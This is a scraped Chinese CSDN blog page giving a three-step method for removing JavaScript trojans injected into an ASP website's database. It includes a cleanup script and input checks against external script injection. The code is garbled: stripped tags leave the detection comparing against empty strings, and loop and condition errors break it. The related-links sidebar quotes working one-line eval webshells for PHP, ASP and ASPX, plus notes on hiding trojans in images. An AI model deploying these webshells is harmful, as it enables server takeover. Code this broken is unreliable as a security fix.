aspx连接mysql木马_ASP网站中数据库被挂木马的解决方案

最新推荐文章于 2021-03-20 13:39:44 发布
最新推荐文章于 2021-03-20 13:39:44 发布
阅读量131 收藏
点赞数
文章标签: aspx连接mysql木马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30110543/article/details/113974587
版权

本文我们详细介绍了ASP数据库被挂木马的详细解决方案之编程处理的方法,解决方案分为以下三步:

第一步:

为现有数据库做好备份。

第二步:

执行如下ASP文件,这样就可以去掉数据库当中的JS木马:

注:conn.asp自己去写了。

'这里放入JS木马内容:请记得改为自己数据库中的JS木马内容。

Server.ScriptTimeOut=180 Set rstSchema = conn.OpenSchema(20)

k=1

Do Until rstSchema.EOF '遍历数据库表

If rstSchema("TABLE_TYPE")="TABLE" Then

response.write K&"."&rstSchema("TABLE_NAME") & ":" '显示表名Set rs=Server.CreateObject("ADODB.Recordset")

sql="select * from [" & rstSchema("TABLE_NAME")&"]"

rs.open sql,conn,1,3 For i=0 to rs.fields.count-1 '遍历表中字段If int(rs(i).Type)=129

or int(rs(i).Type)=130 or int(rs(i).Type)=200 or int(rs(i).Type)=201 or int(rs(i).Type)=202 or int(rs(i).Type)=203 Then'只处理字段类型为字符型的字段

conn.execute("update ["&rstSchema("TABLE_NAME")&"] set "&rs(i).name&" =replace(cast("&rs(i).name&"

as varchar(8000)),'这里放入JS木马内容','')") response.write rs(i).name &" "&rs(i).Type &" "'显示执行过的字段名。

End If

Next

response.write "
"

End If

rstSchema.MoveNext

kk=k+1

Loop

response.Write "执行成功"

%>

如果数据库表很多的话,上面的遍历数据库结构未执行完就被IIS给停止了。在这时候可以在:

If rstSchema("TABLE_TYPE")="TABLE" Then

当中适当加入k值的范围,如:

If rstSchema("TABLE_TYPE")="TABLE" k>10 and k<20 Then

这样的话就一次只操作9个表。

第三步:

根据数据库JS注入的特性(会包括

Function Cheack_Sqljs()'防止数据库外链JS注入:true为发现外链JS注入。

Dim F_Post,F_Get

Cheack_Sqljs=False

If Request.Form<>"" Then'表单提交时的检测For Each F_Post In Request.Form If (Instr(LCase(Request.Form(F_Post)),

"")<>0)

and Instr(LCase(Request.Form(F_Post)),"http://")<>0 Then

Cheack_Sqljs=True

Exit For

End If

Next

End If

If Request.QueryString<>"" Then'QueryString提交时的检测For Each F_Get In Request.QueryString

If (Instr(LCase(Request.Form(F_Get)),"")<>0)

and Instr(LCase(Request.Form(F_Get)),"http://")<>0 Then

Cheack_Sqljs=True

Exit For

End If

Next

End If

End Function

Function CheckDataFrom()'检查提交数据来源:True为数据从站外提交过来的

CheckDataFrom=True

server_v1=Cstr(Request.ServerVariables("HTTP_REFERER")) server_v2=Cstr(Request.ServerVariables("SERVER_NAME"))

if mid(server_v1,8,len(server_v2))<>server_v2 then

CheckDataFrom=False

end if

End Function

If Cheack_Sqljs or CheckDataFrom Then

Response.Write "" Response.End()

End If

关于ASP数据库被挂木马时的编程处理方法就介绍到这里了,希望本次的介绍能够带给您一些收获,谢谢!

郦小号
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
数据库马的ASP处理方法
魔拉宝
08-27 771
数据库马我相信很多人都碰到过。在这里,我讲下我处理的方法。 第一步:为现有数据库做好备份。 第二步: 执行如下ASP文件,这样就可以去掉数据库的JS木马: 注:conn.asp自己去写了。 '这里放入JS木马内容:请记得改为自己数据库的JS木马内容。 "&rstSchema("TABLE_NAME") & ":" '显示表名 Set rs=Server.CreateObject("ADODB.Recordset") sql="select *
aspx连接mysql木马_让你变成ASP木马高手_安全教程_脚本之家
weixin_35700003的博客
03-05 552
1.名称:如何制作图片ASP木马(可显示图片)建一个asp文件,内容为找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为了运行成功,还要搜索,将其变为00,(不要替换自己asp的),再把jpg文件开头加入'response.write'\'style=display:none>最后附上卡拉是条ok总结的1.上传漏洞[不多讲...
aspx连接mysql木马_ASP网站数据库木马怎么办
weixin_42298128的博客
03-05 95
说在前面的话:要防数据库木马,其实最简单不过,本人认为,网上所谓的注入方法,都是些小儿科。只要你不让数据库运行,它注入了ASP木马有何用?!只要你输出时有严格的过滤,它注入了JS代码有何用?!具体方法如下:一、把数据库改为ASP格式,并加入一个表,里面建个字段,加入一些IIS系统级的错误代码或Ole数据,即使被注入ASP木马,即使加入容错处理,它又耐我何?二、输出也简单,只要简单的处理一下“”等一...
ASP网站数据库木马怎么办
netcellsoft的专栏
12-17 564
说在前面的话:要防数据库木马,其实最简单不过,本人认为,网上所谓的注入方法,都是些小儿科。只要你不让数据库运行,它注入了ASP木马有何用?!只要你输出时有严格的过滤,它注入了JS代码有何用?!具体方法如下:一、把数据库改为ASP格式,并加入一个表,里面建个字段,加入一些IIS系统级的错误代码或Ole数据,即使被注入ASP木马,即使加入容错处理,它又耐我何?二、输出也简单,只要简单的
aspx 版webshell
01-16
此文件是一个是一个别人写的webshll,开发环境c#
ASPNET_MySQL.rar_asp mysql_asp.net mysql
09-22
本压缩包文件"ASPNET_MySQL.rar_asp mysql_asp.net mysql"提供了一种实现ASP.NET应用与MySQL数据库交互的实例教程。 首先,我们要了解ASP.NET环境下的MySQL连接ASP.NET是微软开发的一种用于构建动态网站、Web应用...
news_mysql.zip_MYSQL_asp.net mysql
09-20
【新闻MYSQL.zip_MYSQL_asp.net mysql】是一个教学资源,主要涵盖了如何使用ASP.NET与MySQL数据库构建一个简单的新闻发布系统。这个系统对初学者来说是个很好的起点,能够帮助他们理解Web开发的基本概念和技术。 ...
Asp.net 连接MySQL的实现代码[]
01-01
Mysql的connector/net5.0下载地址: http://dev.mysql.com/get/Downloads/Connector-Net/mysql-connector-net-5.0.6.zip/from/pick 安装好以后, 点属性,然后点查找目标,点向上一层目录,找到Binaries\.NET 2.0,然后将...
ASP.NET管理MySQL数据库的小工具_aspx开发教程.rar
09-09
解决方案资源管理器,添加一个新的Web表单(.aspx文件),这将是我们的管理界面的基础。在设计视图,可以添加各种控件,如文本框、下拉列表、复选框等,以供用户输入查询条件或执行操作。 为了连接MySQL...
针对aspx木马可以读取iis站点信息,跨网站目录的临时解决方法
01-10
1、aspx 木马文件可以在asp.net空间实现读取进程、iis信息、跨站、执行cmd命令。 解决方法 1、对于每个网站建立一个用户、并将用户放入guest组,给站点写入、读取的权限。并在iis上允许匿名访问。 2、 代码如下: ...
一句话木马——菜刀软件
qq_37723186的博客
05-04 1227
php的一句话木马: <?php @eval($_POST['pass']);?> asp的一句话木马是: <%eval request ("pass")%> aspx的一句话木马是: <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%> 其pass为设...
Aspx目标网站入侵之旁注加跨站入侵
kendyhj9999的专栏
06-14 2388
指定目标网站入侵之旁注加跨站入侵   2010-09-17 14:06:49|  分类: 默认分类 |  标签: |举报 |字号大小 订阅 今天午群里的幸福又发站出来了,说是网站挺好看的,呵呵。这不用说,铁定的这小子又看上人家源码和模板了。一般他发的网站我都会看的。呵呵,之前也有帮他拿过几个,那小子什么黑客技术基本不懂。拿别人网站程序做网站到还挺能耐滴。    
php301快照劫持代码,2021最新版php/asp/aspx全站快照劫持代码:网站快照劫持适用于百度、搜狗、好搜、谷歌、神马...
weixin_29181861的博客
03-20 1462
2021最新版php/asp/aspx全站动态寄生虫程序配合使用最佳,适用于百度、搜狗、好搜、谷歌、神马。2021最新版php劫持代码功能介绍:首页快照里展示大量index?随机链接,如index.php?随机docx index.php?随机ppt 等链接,这些链接在快照里显示为动态寄生虫页面。php劫持代码部分预览2021最新版asp劫持代码功能介绍:Global.asaasp的劫持代码上...
ASPX一句话***--终极版&详细分析(ASP-EXECUTE VS ASPX-EVAL)
weixin_34366546的博客
08-09 627
信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])注意:本文章首发[url]http://blog.csdn.net/kj021320/archive/2007/08/04/1726442.aspx[/url],后由原创作者kj021320友情提交到邪恶八进制信息安全团队论坛。首先回顾一下以前ASP一句话的经典***吧! <...
ASPX一句话木马--终极版&详细分析(ASP-EXECUTE VS ASPX-EVAL)
热门推荐
Quantum Intelligence
08-04 5万+
首先回顾一下以前ASP一句话的经典木马吧!"" then execute request("nonamed")%>VBSexecute就是动态运行指定的代码而JSCRIPT也同样有eval函数可以实现,也就是说ASP一句话木马也有个版本是采用JSCRIPT的 eval的!网上也有例子我就不多说了!.....然后解析语言终究发展成为间代码例如java .net  动态执行也就不存在
加密aspx webshell_你所不知道的Webshell基础篇
weixin_39845220的博客
11-24 1025
Webshell利用的起因企业对外提供服务的应用通常以Web形式呈现,因此Web站点经常成为攻击者的攻击目标。攻击者找到Web站点可利用的漏洞后,为了扩大战果或维持对目标站点的控制权限,通常会在Web站点植入Webshell程序。Webshell是以网页文件形式存在的一种命令执行环境,也可以将其称为网页后门。根据Web服务器环境的不同,Webshell分为asp、php、jsp、cgi等...
aspx怎么连接mysql数据库
最新发布
10-30
ASP.NET连接MySQL数据库,需要使用MySQL Connector/NET。以下是连接MySQL数据库的步骤: 1. 下载并安装MySQL Connector/NET。 2. 在项目添加对MySQL Connector/NET的引用。 3. 在Web.config文件添加MySQL...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值